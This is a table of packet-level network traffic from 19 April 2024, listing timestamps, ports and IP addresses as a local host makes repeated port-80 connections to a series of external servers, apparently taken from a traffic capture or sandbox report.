Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 03:28:30.736448050 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.039288998 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.039411068 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.042812109 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.345438957 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.345974922 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.346008062 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.346163034 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.350464106 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.355118036 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.355180025 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.555383921 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:31.555470943 CEST	49717	80	192.168.2.6	154.215.72.110
Apr 19, 2024 03:28:31.653214931 CEST	80	49717	154.215.72.110	192.168.2.6
Apr 19, 2024 03:28:46.852149963 CEST	49719	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:47.174521923 CEST	80	49719	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:47.174647093 CEST	49719	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:47.176548958 CEST	49719	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:47.498610020 CEST	80	49719	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:47.510149002 CEST	80	49719	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:47.510214090 CEST	80	49719	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:47.510288000 CEST	49719	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:48.689780951 CEST	49719	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:49.708937883 CEST	49720	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:50.028851032 CEST	80	49720	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:50.029031038 CEST	49720	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:50.048801899 CEST	49720	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:50.368773937 CEST	80	49720	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:50.369190931 CEST	80	49720	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:50.369492054 CEST	80	49720	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:50.369555950 CEST	49720	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:51.595350027 CEST	49720	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:52.599327087 CEST	49721	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:52.928157091 CEST	80	49721	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:52.928277969 CEST	49721	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:52.930949926 CEST	49721	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:53.259785891 CEST	80	49721	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:53.259815931 CEST	80	49721	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:53.279891014 CEST	80	49721	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:53.279951096 CEST	80	49721	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:53.280073881 CEST	49721	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:54.439663887 CEST	49721	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:55.459012985 CEST	49723	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:55.802478075 CEST	80	49723	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:55.802575111 CEST	49723	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:55.804569006 CEST	49723	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:56.145917892 CEST	80	49723	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:56.147546053 CEST	80	49723	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:56.147578955 CEST	80	49723	202.172.28.202	192.168.2.6
Apr 19, 2024 03:28:56.147720098 CEST	49723	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:56.151252031 CEST	49723	80	192.168.2.6	202.172.28.202
Apr 19, 2024 03:28:56.493607998 CEST	80	49723	202.172.28.202	192.168.2.6
Apr 19, 2024 03:29:01.727843046 CEST	49725	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:02.014632940 CEST	80	49725	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:02.014724016 CEST	49725	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:02.016653061 CEST	49725	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:02.305318117 CEST	80	49725	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:02.305527925 CEST	49725	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:03.517729044 CEST	49725	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:04.536487103 CEST	49726	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:04.813963890 CEST	80	49726	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:04.814059973 CEST	49726	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:04.816023111 CEST	49726	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:05.095027924 CEST	80	49726	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:05.095160961 CEST	49726	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:06.330387115 CEST	49726	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:07.352272987 CEST	49727	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:07.650084972 CEST	80	49727	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:07.650223017 CEST	49727	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:07.740542889 CEST	49727	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:08.038516998 CEST	80	49727	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:08.040141106 CEST	80	49727	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:08.040211916 CEST	49727	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:09.252163887 CEST	49727	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.271193027 CEST	49728	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.575661898 CEST	80	49728	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:10.575881004 CEST	49728	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.577805996 CEST	49728	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.871731043 CEST	80	49728	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:10.872019053 CEST	49728	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.876646042 CEST	49728	80	192.168.2.6	116.50.37.244
Apr 19, 2024 03:29:10.879321098 CEST	80	49728	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:11.179913998 CEST	80	49728	116.50.37.244	192.168.2.6
Apr 19, 2024 03:29:16.212971926 CEST	49729	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:16.411144972 CEST	80	49729	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:16.411602020 CEST	49729	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:16.413825989 CEST	49729	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:16.612000942 CEST	80	49729	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:16.612190008 CEST	80	49729	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:16.612210035 CEST	80	49729	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:16.612301111 CEST	49729	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:17.924115896 CEST	49729	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:18.943758011 CEST	49730	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:19.140963078 CEST	80	49730	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:19.141251087 CEST	49730	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:19.143745899 CEST	49730	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:19.341092110 CEST	80	49730	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:19.341626883 CEST	80	49730	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:19.341667891 CEST	80	49730	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:19.341744900 CEST	49730	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:20.658385992 CEST	49730	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:21.679138899 CEST	49733	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:21.876585007 CEST	80	49733	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:21.876943111 CEST	49733	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:21.879568100 CEST	49733	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:22.077229023 CEST	80	49733	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:22.077258110 CEST	80	49733	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:22.077750921 CEST	80	49733	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:22.077769041 CEST	80	49733	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:22.077955961 CEST	49733	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:23.392819881 CEST	49733	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:24.411750078 CEST	49734	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:24.609134912 CEST	80	49734	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:24.610697031 CEST	49734	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:24.612482071 CEST	49734	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:24.809710979 CEST	80	49734	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:24.810463905 CEST	80	49734	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:24.810528040 CEST	80	49734	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:24.810714006 CEST	49734	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:24.840840101 CEST	49734	80	192.168.2.6	46.30.213.191
Apr 19, 2024 03:29:25.038198948 CEST	80	49734	46.30.213.191	192.168.2.6
Apr 19, 2024 03:29:30.554775000 CEST	49735	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:30.799824953 CEST	80	49735	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:30.802890062 CEST	49735	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:30.804723024 CEST	49735	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:31.049678087 CEST	80	49735	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:31.094563007 CEST	80	49735	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:31.094840050 CEST	49735	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:32.314764023 CEST	49735	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:33.333519936 CEST	49736	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:33.576355934 CEST	80	49736	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:33.576529980 CEST	49736	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:33.578766108 CEST	49736	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:33.821481943 CEST	80	49736	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:33.869122982 CEST	80	49736	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:33.869190931 CEST	49736	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:35.080921888 CEST	49736	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:36.100817919 CEST	49737	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:36.344377041 CEST	80	49737	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:36.345983028 CEST	49737	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:36.348773003 CEST	49737	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:36.592354059 CEST	80	49737	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:36.633735895 CEST	80	49737	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:36.635330915 CEST	80	49737	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:36.635467052 CEST	49737	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:37.861558914 CEST	49737	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:38.880317926 CEST	49738	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:39.125457048 CEST	80	49738	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:39.129028082 CEST	49738	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:39.132958889 CEST	49738	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:39.380234957 CEST	80	49738	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:39.380368948 CEST	49738	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:39.383166075 CEST	49738	80	192.168.2.6	85.159.66.93
Apr 19, 2024 03:29:39.628164053 CEST	80	49738	85.159.66.93	192.168.2.6
Apr 19, 2024 03:29:44.509131908 CEST	49739	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:44.720712900 CEST	80	49739	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:44.720810890 CEST	49739	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:44.722827911 CEST	49739	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:44.935115099 CEST	80	49739	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:44.935133934 CEST	80	49739	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:44.935211897 CEST	49739	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:46.236531019 CEST	49739	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:47.256143093 CEST	49741	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:47.467119932 CEST	80	49741	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:47.467199087 CEST	49741	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:47.469289064 CEST	49741	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:47.680767059 CEST	80	49741	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:47.680815935 CEST	80	49741	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:47.680871010 CEST	49741	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:48.970879078 CEST	49741	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:49.990619898 CEST	49742	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:50.201236963 CEST	80	49742	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:50.201410055 CEST	49742	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:50.203231096 CEST	49742	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:50.413726091 CEST	80	49742	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:50.414629936 CEST	80	49742	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:50.414684057 CEST	80	49742	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:50.414748907 CEST	49742	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:51.705310106 CEST	49742	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:52.723304987 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:52.934956074 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:52.937696934 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:52.940001011 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.190486908 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190532923 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190572977 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190684080 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190692902 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.190726995 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190761089 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.190768003 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190807104 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190845966 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190882921 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.190884113 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.190882921 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.190922976 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.191255093 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.402618885 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402683020 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402721882 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402762890 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402760029 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.402805090 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402823925 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.402846098 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402884007 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.402898073 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.402929068 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:29:53.403034925 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.406408072 CEST	49743	80	192.168.2.6	91.195.240.94
Apr 19, 2024 03:29:53.617645025 CEST	80	49743	91.195.240.94	192.168.2.6
Apr 19, 2024 03:30:07.201221943 CEST	49744	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:07.355319023 CEST	80	49744	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:07.355403900 CEST	49744	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:07.356997013 CEST	49744	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:07.510992050 CEST	80	49744	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:07.524143934 CEST	80	49744	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:07.524184942 CEST	80	49744	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:07.524322987 CEST	49744	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:08.861721992 CEST	49744	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:09.881273031 CEST	49745	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:10.035120964 CEST	80	49745	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:10.035201073 CEST	49745	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:10.042437077 CEST	49745	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:10.196096897 CEST	80	49745	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:10.211322069 CEST	80	49745	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:10.211339951 CEST	80	49745	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:10.211431026 CEST	49745	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:11.549154043 CEST	49745	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:12.567620993 CEST	49746	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:12.721709013 CEST	80	49746	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:12.722876072 CEST	49746	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:12.726802111 CEST	49746	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:12.880927086 CEST	80	49746	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:12.880945921 CEST	80	49746	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:12.894342899 CEST	80	49746	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:12.894361019 CEST	80	49746	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:12.894862890 CEST	49746	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:14.236552000 CEST	49746	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.258788109 CEST	49747	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.412848949 CEST	80	49747	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:15.412923098 CEST	49747	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.415205002 CEST	49747	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.569453001 CEST	80	49747	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:15.584261894 CEST	80	49747	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:15.584659100 CEST	80	49747	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:15.584702015 CEST	49747	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.587160110 CEST	49747	80	192.168.2.6	66.29.149.46
Apr 19, 2024 03:30:15.741040945 CEST	80	49747	66.29.149.46	192.168.2.6
Apr 19, 2024 03:30:21.020701885 CEST	49749	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:21.238612890 CEST	80	49749	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:21.238751888 CEST	49749	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:21.242778063 CEST	49749	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:21.461474895 CEST	80	49749	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:21.465096951 CEST	80	49749	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:21.465219975 CEST	80	49749	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:21.465287924 CEST	49749	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:22.752160072 CEST	49749	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:23.772713900 CEST	49750	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:23.992641926 CEST	80	49750	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:23.992721081 CEST	49750	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:23.995161057 CEST	49750	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:24.214770079 CEST	80	49750	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:24.219103098 CEST	80	49750	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:24.219317913 CEST	80	49750	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:24.219372034 CEST	49750	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:25.502475023 CEST	49750	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:26.525809050 CEST	49751	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:26.750092983 CEST	80	49751	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:26.750891924 CEST	49751	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:26.753413916 CEST	49751	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:26.977368116 CEST	80	49751	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:26.977610111 CEST	80	49751	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:26.989162922 CEST	80	49751	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:26.989491940 CEST	80	49751	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:26.997149944 CEST	49751	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:28.267962933 CEST	49751	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.285728931 CEST	49752	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.505542040 CEST	80	49752	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:29.505659103 CEST	49752	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.508091927 CEST	49752	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.727536917 CEST	80	49752	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:29.734710932 CEST	80	49752	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:29.734808922 CEST	80	49752	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:29.734894991 CEST	49752	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.739300013 CEST	49752	80	192.168.2.6	195.110.124.133
Apr 19, 2024 03:30:29.958945036 CEST	80	49752	195.110.124.133	192.168.2.6
Apr 19, 2024 03:30:34.983881950 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.087795019 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.088901043 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.092833042 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.197021008 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252870083 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252897024 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252914906 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252933025 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252948999 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252963066 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.252965927 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.252989054 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.253034115 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:35.253216982 CEST	80	49753	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:35.256992102 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:36.597242117 CEST	49753	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.615096092 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.718909025 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.718997955 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.721256018 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.825082064 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885565042 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885607004 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885646105 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885653973 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.885687113 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885721922 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885730982 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.885759115 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.885803938 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:37.885967016 CEST	80	49754	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:37.886014938 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:39.237206936 CEST	49754	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.255811930 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.360096931 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.361156940 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.364967108 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.469171047 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.469263077 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522475004 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522504091 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522524118 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522542953 CEST	80	49755	23.227.38.74	192.168.2.6
